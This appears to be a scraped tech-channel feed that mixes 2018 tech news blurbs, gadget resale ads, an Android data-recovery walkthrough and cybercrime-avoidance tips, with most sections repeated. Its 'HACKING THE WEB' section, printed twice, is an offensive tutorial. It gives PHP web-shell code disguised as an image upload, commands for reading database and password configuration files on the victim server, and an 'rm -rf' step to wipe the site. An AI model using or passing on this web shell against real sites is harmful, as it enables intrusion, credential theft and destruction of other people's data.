(Tumblr patches a critical vulnerability)[https://thehackernews.com/2018/10/tumblr-account-hacking.html] in the "Recommended Blogs" feature on its desktop version of the website that could have allowed hacker to steal users’ account information, including emails and passwords (hashed and salted)
sandisk available brand new 256GB ....inbox me @febifebian
Ubuntu 18.10 Is Out With a New Theme and Snappier Desktop Performance
https://www.howtogeek.com/fyi/ubuntu-18.10-is-out-with-a-new-theme-and-snappier-desktop-performance/
https://www.howtogeek.com/fyi/ubuntu-18.10-is-out-with-a-new-theme-and-snappier-desktop-performance/
How-To Geek
Ubuntu 18.10 Is Out With a New Theme and Snappier Desktop Performance
Ubuntu 18.10 “Cosmic Cuttlefish” is now available. This releases features a shiny new theme named “Yaru,” which was originally scheduled for Ubuntu 18.04 LTS. The new GNOME 3.30 improves desktop performance, too.
Windows 10’s Next Update Will Make Your PC Faster, Thanks to Better Spectre Fixes
https://www.howtogeek.com/fyi/windows-10s-next-update-will-make-your-pc-faster-thanks-to-better-spectre-fixes/
https://www.howtogeek.com/fyi/windows-10s-next-update-will-make-your-pc-faster-thanks-to-better-spectre-fixes/
How-To Geek
Windows 10’s Next Update Will Make Your PC Faster, Thanks to Better Spectre Fixes
Your PC has been slower ever since Microsoft patched the Spectre flaws back in January 2018. PCs from 2015 and earlier slowed down the most. Now, Windows 10’s next update will mostly eliminate those slowdowns, making your PC faster.
What is WiGig, and How Is It Different From Wi-Fi 6?
https://www.howtogeek.com/371328/what-is-wigig-and-how-is-it-different-from-wi-fi-6/
https://www.howtogeek.com/371328/what-is-wigig-and-how-is-it-different-from-wi-fi-6/
How-To Geek
What is WiGig, and How Is It Different From Wi-Fi 6?
Wi-Fi 6 is on the way, but it isn’t the fastest wireless technology you can get. WiGig is designed for super-fast speeds over short distances, and an improved version is coming in 2019.
How 5G Could Transform Your Home Internet Connection
https://www.howtogeek.com/366259/how-5g-could-transform-your-home-internet-connection/
https://www.howtogeek.com/366259/how-5g-could-transform-your-home-internet-connection/
How-To Geek
How 5G Could Transform Your Home Internet Connection
Verizon is about to launch home internet service using 5G. This new wireless standard isn’t just about faster data for your smartphone—it could finally offer competition for home internet, breaking the cable companies’ local monopolies and giving you a choice.
Wi-Fi 6: What’s Different, and Why it Matters
https://www.howtogeek.com/368332/wi-fi-6-what%e2%80%99s-different-and-why-it-matters/
https://www.howtogeek.com/368332/wi-fi-6-what%e2%80%99s-different-and-why-it-matters/
How-To Geek
What Is Wi-Fi 6? (802.11ax)
Wi-Fi 6 is the current-generation wireless standard that’s faster than 802.11ac. More than speed, it provides better performance in congested areas, from stadiums to your own device-packed home. Wi-Fi 6 officially arrived in late 2019, and Wi-Fi 6-enabled…
What’s the Difference Between 2.4 and 5-Ghz Wi-Fi (and Which Should I Use)?
https://www.howtogeek.com/222249/whats-the-difference-between-2.4-ghz-and-5-ghz-wi-fi-and-which-should-you-use/
https://www.howtogeek.com/222249/whats-the-difference-between-2.4-ghz-and-5-ghz-wi-fi-and-which-should-you-use/
How-To Geek
What’s the Difference Between 2.4 and 5 GHz Wi-Fi (and Which Should I Use)?
If you’re looking at replacing your old router—maybe even upgrading from your ISP’s combined modem/router unit—you may come across terms like “dual band,” which refers to a router that uses both 2.4 GHz and 5 GHz Wi-Fi. Curious about what these numbers mean?…
Windows 10’s Next Update Will Make Your PC Faster, Thanks to Better Spectre Fixes
https://www.howtogeek.com/fyi/windows-10s-next-update-will-make-your-pc-faster-thanks-to-better-spectre-fixes/
https://www.howtogeek.com/fyi/windows-10s-next-update-will-make-your-pc-faster-thanks-to-better-spectre-fixes/
How-To Geek
Windows 10’s Next Update Will Make Your PC Faster, Thanks to Better Spectre Fixes
Your PC has been slower ever since Microsoft patched the Spectre flaws back in January 2018. PCs from 2015 and earlier slowed down the most. Now, Windows 10’s next update will mostly eliminate those slowdowns, making your PC faster.
Am buying dead & used laptops with everything intact kindly inbox, turn your dead laptops into cash inbox me @febifebian
FireEye: Russian Research Lab Aided the Development of TRITON Industrial Malware
Cybersecurity firm FireEye claims to have discovered evidence that proves the involvement of a Russian-owned research institute in the development of the TRITON malware that caused some industrial systems to unexpectedly shut down last year, including a petrochemical plant in Saudi Arabia.
TRITON, also known as Trisis, is a piece of ICS malware designed to target the Triconex Safety
➖ @Geekstechcomputers ➖
Cybersecurity firm FireEye claims to have discovered evidence that proves the involvement of a Russian-owned research institute in the development of the TRITON malware that caused some industrial systems to unexpectedly shut down last year, including a petrochemical plant in Saudi Arabia.
TRITON, also known as Trisis, is a piece of ICS malware designed to target the Triconex Safety
➖ @Geekstechcomputers ➖
🔴 How to recover deleted image or video from android (internal
storage) without root ❓
▪️STEP 1: DOWNLOAD AND INSTALL JIHOSOFT
ANDROID PHONE RECOVERY AT YOUR COMPUTER.
👉You could download the Windows version at:
Android Recovery , download Mac version at:
Android Recovery for Mac . After download, you will
be lead to install the app at your computer.
▪️STEP 2: SELECT DATA GENRE THAT YOU NEED TOSCANAfter installation, run the app at your PC. You willsee the interface show you four options:
👉“Mul”, “Database”, “WhatsApp”, “All”. Tap
One of it according to your own demand.
▪️STEP 3: IDENTIFY ANDROID PHONE OR TABLET BY COMPUTER.
👉First, connect your android device to computer via USB cable. Then, turn on USB debugging at android
equipment.If the app failed to identify your equipment, install related USB driver at your computer.
▪️STEP 4: SCAN ANDROID DEVICE AND EXPECT THE RESULT
👉After identification, click "Start" for scanning.
Please be patient about the process.
▪️STEP 5: PREVIEW DATA THAT LISTED ON THE
RESULT.
👉You will be able to review all the details of desired
data.
▪️STEP 6: RECOVER DATA FROM ANDROID WITHOUT
ROOT.
👉Mark those data that you want, then tap “Recover”to fulfill android data recovery without root.
storage) without root ❓
▪️STEP 1: DOWNLOAD AND INSTALL JIHOSOFT
ANDROID PHONE RECOVERY AT YOUR COMPUTER.
👉You could download the Windows version at:
Android Recovery , download Mac version at:
Android Recovery for Mac . After download, you will
be lead to install the app at your computer.
▪️STEP 2: SELECT DATA GENRE THAT YOU NEED TOSCANAfter installation, run the app at your PC. You willsee the interface show you four options:
👉“Mul”, “Database”, “WhatsApp”, “All”. Tap
One of it according to your own demand.
▪️STEP 3: IDENTIFY ANDROID PHONE OR TABLET BY COMPUTER.
👉First, connect your android device to computer via USB cable. Then, turn on USB debugging at android
equipment.If the app failed to identify your equipment, install related USB driver at your computer.
▪️STEP 4: SCAN ANDROID DEVICE AND EXPECT THE RESULT
👉After identification, click "Start" for scanning.
Please be patient about the process.
▪️STEP 5: PREVIEW DATA THAT LISTED ON THE
RESULT.
👉You will be able to review all the details of desired
data.
▪️STEP 6: RECOVER DATA FROM ANDROID WITHOUT
ROOT.
👉Mark those data that you want, then tap “Recover”to fulfill android data recovery without root.
HACKING THE WEB
method: uploading a php shell on the site
a lot of sites run php. when you put php code in an image and upload it to a server, the server will execute it
so open notepad and type these codes
<?php
if (isset($_REQUEST['cmd'])){
$cmd = $_GET['cmd'];
system($cmd);
} else {
echo "error opening image"
}
save the file as img.png and upload it to the site you want to hack (if they have image upload available)
after uploading the image, click on it and look at the url (it will end in img.png
now add
?cmd=locate+my.cnf
this command will look for the php password file
you will see some text like
/home/www/my.cnf
then read it using
?cmd=cat+/home/www/my.cnf
use this to find the database and read it using cat
?cmd=locate+*.db
use this to find the configuration file for the site(contains passwords)
?cmd=locate+config.php
use this to format the hard disk of the site
;)
?cmd=rm+-rf
👌Done happy hacking.
method: uploading a php shell on the site
a lot of sites run php. when you put php code in an image and upload it to a server, the server will execute it
so open notepad and type these codes
<?php
if (isset($_REQUEST['cmd'])){
$cmd = $_GET['cmd'];
system($cmd);
} else {
echo "error opening image"
}
save the file as img.png and upload it to the site you want to hack (if they have image upload available)
after uploading the image, click on it and look at the url (it will end in img.png
now add
?cmd=locate+my.cnf
this command will look for the php password file
you will see some text like
/home/www/my.cnf
then read it using
?cmd=cat+/home/www/my.cnf
use this to find the database and read it using cat
?cmd=locate+*.db
use this to find the configuration file for the site(contains passwords)
?cmd=locate+config.php
use this to format the hard disk of the site
;)
?cmd=rm+-rf
👌Done happy hacking.
Simple steps to avoid being a Cybercrime Victim
〰〰〰〰〰〰〰〰〰
1.Avoid using public networks.Refrain from connecting to free Wi-Fi networks from coffee shops or other public places. Connecting your device to public networks exposes it potential hackers that can easily get through the low level security of these kinds of networks.
2.Avoid using public computers for sensitive business. If you’re about to do some personal transactions like banking or online shopping, do not do it using public computers. Other people who have used the computers before you may have put programs that can record the passwords you type in.
3.Do not give out your passwords.Keep the passwords of your various accounts to yourself. If you do let someone know, make sure to change it afterwards to prevent that person from accessing your private internet accounts without permission.
4.Avoid downloading unknown applications. The Internet is full of free software from unknown sources. These kinds of programs normally carry malicious applications with it and installing it may infect and cause serious damage to your computer.
〰〰〰〰〰〰〰〰〰
1.Avoid using public networks.Refrain from connecting to free Wi-Fi networks from coffee shops or other public places. Connecting your device to public networks exposes it potential hackers that can easily get through the low level security of these kinds of networks.
2.Avoid using public computers for sensitive business. If you’re about to do some personal transactions like banking or online shopping, do not do it using public computers. Other people who have used the computers before you may have put programs that can record the passwords you type in.
3.Do not give out your passwords.Keep the passwords of your various accounts to yourself. If you do let someone know, make sure to change it afterwards to prevent that person from accessing your private internet accounts without permission.
4.Avoid downloading unknown applications. The Internet is full of free software from unknown sources. These kinds of programs normally carry malicious applications with it and installing it may infect and cause serious damage to your computer.